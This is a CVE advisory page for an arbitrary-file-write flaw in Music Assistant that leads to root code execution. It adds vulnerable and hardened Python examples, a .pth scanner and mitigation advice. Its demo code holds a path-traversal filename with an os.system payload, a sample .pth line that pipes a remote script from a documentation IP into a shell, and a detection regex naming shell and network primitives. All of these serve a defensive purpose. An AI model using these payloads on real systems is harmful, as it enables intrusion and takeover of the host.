CVE-2026-26975
Arbitrary File Write in Music Assistant Enables Remote Code Execution
Publication date: 2026-02-20
Last updated on: 2026-03-17
Assigner: GitHub, Inc.
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| music-assistant | music_assistant_server | < 2.7.0 (all releases before 2.7.0; 2.7.0 itself is not affected) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-434 | The product allows the upload or transfer of dangerous file types that are automatically processed within its environment. |
| CWE-73 | The product allows user input to control or influence paths or file names that are used in filesystem operations. |
| CWE-22 | The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-26975 is a high-severity remote code execution vulnerability in Music Assistant versions 2.6.3 and below. It arises because the `music/playlists/update` API does not enforce the `.m3u` extension on the playlist file it writes, and the storage path it writes to can be steered by the caller, so a single request can place attacker-controlled content at an arbitrary location on the filesystem (CWE-434, CWE-73 and CWE-22 above).
An unauthenticated, network-adjacent attacker turns that write into code execution by dropping a `.pth` file into the Python site-packages directory: the interpreter's `site` module processes every `.pth` file there at startup and executes any line that begins with `import` as Python code. Because the Music Assistant container runs as root and the web interface is exposed without authentication, that code runs as root the next time a Python process in the container starts.
The attack therefore consists of manipulating the playlist storage path and file name, and planting a `.pth` line that downloads and runs further binaries or scripts, which yields full remote code execution on the affected system.
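As an added illustration, not Music Assistant's code and not a reproduction of its internals, the following shows the pattern the three CWEs above describe (a caller-controlled playlist name reaching the filesystem with no extension or directory check) next to the checks that close it. The function names, the directory layout, the hostile name and the `.pth` payload are all constructed for this page; a sibling `site-packages` directory stands in for the interpreter's real one.

```python
"""Added example for this page. It is not Music Assistant's code and does not
reproduce its internals: the function names, the directory layout and the
attacker input are all constructed here to show the pattern the advisory
describes (a caller-controlled playlist name reaching the filesystem without
an extension or directory check) next to the checks that close it."""
from __future__ import annotations

import tempfile
from pathlib import Path, PurePosixPath


def save_playlist_vulnerable(storage_dir: str, name: str, entries: list[str]) -> Path:
    """Weak variant: the name is joined onto the storage directory as-is.
    A name such as '../site-packages/evil.pth' walks out of the playlist
    directory, and the extension is whatever the caller sent."""
    path = Path(storage_dir) / name
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text("\n".join(entries) + "\n")
    return path


class PlaylistPathError(ValueError):
    """Raised when a playlist name cannot be mapped to a file under the root."""


def resolve_playlist_path(playlists_root: Path, name: str) -> Path:
    """Map a user-supplied playlist name to a file that must sit directly in
    playlists_root and must end in .m3u; raise otherwise."""
    # 1. One path component only: no separators, no '.', '..' or NUL.
    if (not name or name in (".", "..") or "\\" in name or "\0" in name
            or PurePosixPath(name).name != name):
        raise PlaylistPathError(f"invalid playlist name: {name!r}")
    # 2. The server, not the caller, decides the extension.
    if not name.lower().endswith(".m3u"):
        name += ".m3u"
    # 3. Resolve symlinks on both sides and confine: the parent must be the root.
    root = playlists_root.resolve()
    target = (root / name).resolve()
    if target.parent != root:
        raise PlaylistPathError(f"path escapes playlist directory: {target}")
    return target


def save_playlist_safe(playlists_root: Path, name: str, entries: list[str]) -> Path:
    """Hardened variant: write only where resolve_playlist_path allows."""
    target = resolve_playlist_path(playlists_root, name)
    playlists_root.mkdir(parents=True, exist_ok=True)
    target.write_text("\n".join(entries) + "\n")
    return target


def demo() -> dict:
    """Run both variants against a throwaway tree and report what happened.
    The tree, the hostile name and the .pth payload are constructed for the
    example; 'site-packages' here is a sibling directory standing in for the
    interpreter's real one. The payload is written, never executed."""
    base = Path(tempfile.mkdtemp(prefix="playlist-demo-"))
    playlists = base / "playlists"
    site_packages = base / "site-packages"
    playlists.mkdir()
    site_packages.mkdir()

    hostile_name = "../site-packages/evil.pth"
    # A .pth line starting with 'import' is executed by site.py at interpreter start.
    payload = ['import os; os.system("id > /tmp/pwned")']

    written = save_playlist_vulnerable(str(playlists), hostile_name, payload)
    escaped = written.resolve().parent == site_packages.resolve()

    try:
        save_playlist_safe(playlists, hostile_name, payload)
        blocked = False
    except PlaylistPathError:
        blocked = True

    good = save_playlist_safe(playlists, "party", ["#EXTM3U", "track1.mp3"])
    return {
        "vulnerable_wrote_outside_root": escaped,
        "safe_blocked_hostile_name": blocked,
        "safe_file_name": good.name,
        "files_in_site_packages": sorted(p.name for p in site_packages.iterdir()),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The third check matters even with the first two in place: resolving both sides before comparing parents is what catches a symlink inside the playlist directory that points elsewhere.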
How can this vulnerability impact me?
This vulnerability allows an attacker to execute arbitrary code with root privileges on your Music Assistant installation without any authentication or user interaction.
The impact includes complete compromise of the affected system, allowing attackers to install malware, steal data, disrupt services, or use the system as a foothold for further attacks.
Because the container runs as root, the attacker gains full control over the host environment, which can lead to severe confidentiality, integrity, and availability breaches.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring network traffic and API requests to the Music Assistant service, especially on port 8095, where the web interface is exposed without authentication in vulnerable versions (2.6.3 and below). Suspicious API requests carrying the `music/playlists/update` command that attempt to write files with an extension other than `.m3u`, or that target critical filesystem paths (such as Python site-packages directories), may indicate exploitation attempts.
Commands to detect potential exploitation include inspecting active network connections and HTTP requests to port 8095, for example with tcpdump or Wireshark filtered on that port:
- Use tcpdump to capture traffic on port 8095: `tcpdump -i any port 8095 -w capture.pcap`
- Use curl or a similar tool to check whether the API is reachable without authentication: `curl -i http://<host>:8095/music/playlists/update`. Treat the response as a reachability check only; the question that matters is whether the server accepts API requests without a login, which the 2.7.0 fix (mandatory authentication) changes.
- Check the Python site-packages directories for unexpected `.pth` files. Any line in a `.pth` file that begins with `import` is executed by the interpreter at startup, so those lines are where a dropped payload lives.
Additionally, reviewing logs for HTTP 500 errors triggered by malicious API calls, or for unexpected Python process startups, may help identify exploitation attempts. [1]
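An added helper for the last check above; it is not part of Music Assistant and not a tool the page names. It lists the `.pth` files in the interpreter's site-packages directories and reports the lines CPython's `site` module would execute (those beginning with `import` followed by a space or tab; every other line is a path entry). The indicator regex, the sample files and the `198.51.100.7` address (a documentation range) are constructed for the example.

```python
"""Added detection helper for this page; it is not part of Music Assistant and
not a tool the page names. It lists the .pth files in Python's site-packages
directories and reports the lines the interpreter would execute. CPython's
site module treats any .pth line that begins with 'import' followed by a space
or tab as Python code and runs it at startup; every other line is a path entry.
The indicator regex and the sample files are constructed for the example."""
from __future__ import annotations

import re
import site
import tempfile
from pathlib import Path

# Constructs that a benign .pth hook (an editable-install finder, a shim loader)
# has no reason to use. Illustrative, not a signature set; tune for your environment.
SUSPICIOUS = re.compile(
    r"os\.system|subprocess|os\.popen|urllib|urlopen|socket|base64|"
    r"exec\(|eval\(|chmod|/tmp/|/dev/tcp"
)


def executable_lines(pth_text: str) -> list[str]:
    """Return the lines site.py would exec() rather than add to sys.path."""
    return [line.rstrip("\r\n") for line in pth_text.splitlines()
            if line.startswith(("import ", "import\t"))]


def scan_pth_dirs(dirs: list[Path]) -> list[dict]:
    """Report every executable .pth line under the given directories."""
    findings = []
    for directory in dirs:
        if not directory.is_dir():
            continue
        for pth in sorted(directory.glob("*.pth")):
            try:
                text = pth.read_text(errors="replace")
            except OSError:
                continue
            for line in executable_lines(text):
                findings.append({
                    "file": str(pth),
                    "line": line,
                    "suspicious": bool(SUSPICIOUS.search(line)),
                })
    return findings


def default_site_dirs() -> list[Path]:
    """The directories this interpreter itself processes .pth files from."""
    dirs = [Path(p) for p in getattr(site, "getsitepackages", list)()]
    user = site.getusersitepackages()
    if user:
        dirs.append(Path(user))
    return dirs


def demo() -> list[dict]:
    """Scan a constructed site-packages directory holding three sample files."""
    sp = Path(tempfile.mkdtemp(prefix="pth-scan-demo-")) / "site-packages"
    sp.mkdir()
    # Path-only entries: never executed.
    (sp / "paths-only.pth").write_text("/opt/extra/lib\n../extra-pkg\n")
    # Executed at startup, but the kind of hook editable installs legitimately use.
    (sp / "some-editable.pth").write_text(
        "import _some_editable_finder; _some_editable_finder.install()\n")
    # Executed at startup; constructed stand-in for a dropped payload.
    (sp / "zz-evil.pth").write_text(
        'import os; os.system("curl -s http://198.51.100.7/x.sh | sh")\n')
    return scan_pth_dirs([sp])


if __name__ == "__main__":
    for f in scan_pth_dirs(default_site_dirs()):
        flag = "SUSPICIOUS" if f["suspicious"] else "executes  "
        print(f"{flag} {f['file']}: {f['line']}")
```

Run it inside the container with the same interpreter Music Assistant uses, since `site.getsitepackages()` reports that interpreter's directories, not the host's. Every executable line is worth a look even when the regex does not fire; legitimate ones are few and usually come from editable installs or packaging shims.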
What immediate steps should I take to mitigate this vulnerability?
The immediate and most effective mitigation is to upgrade Music Assistant to version 2.7.0 or later, where this vulnerability has been fixed by enforcing mandatory authentication on the webserver and API.
If upgrading immediately is not possible, restrict network access to the Music Assistant service port (8095) to trusted hosts or networks only, for example by firewall rules or network segmentation, so that unauthenticated clients cannot reach the API.
Implement monitoring to detect suspicious API usage and file system changes, especially in the Python site-packages directory.
After upgrading, ensure that authentication is properly configured and that admin accounts are created as required by the new version.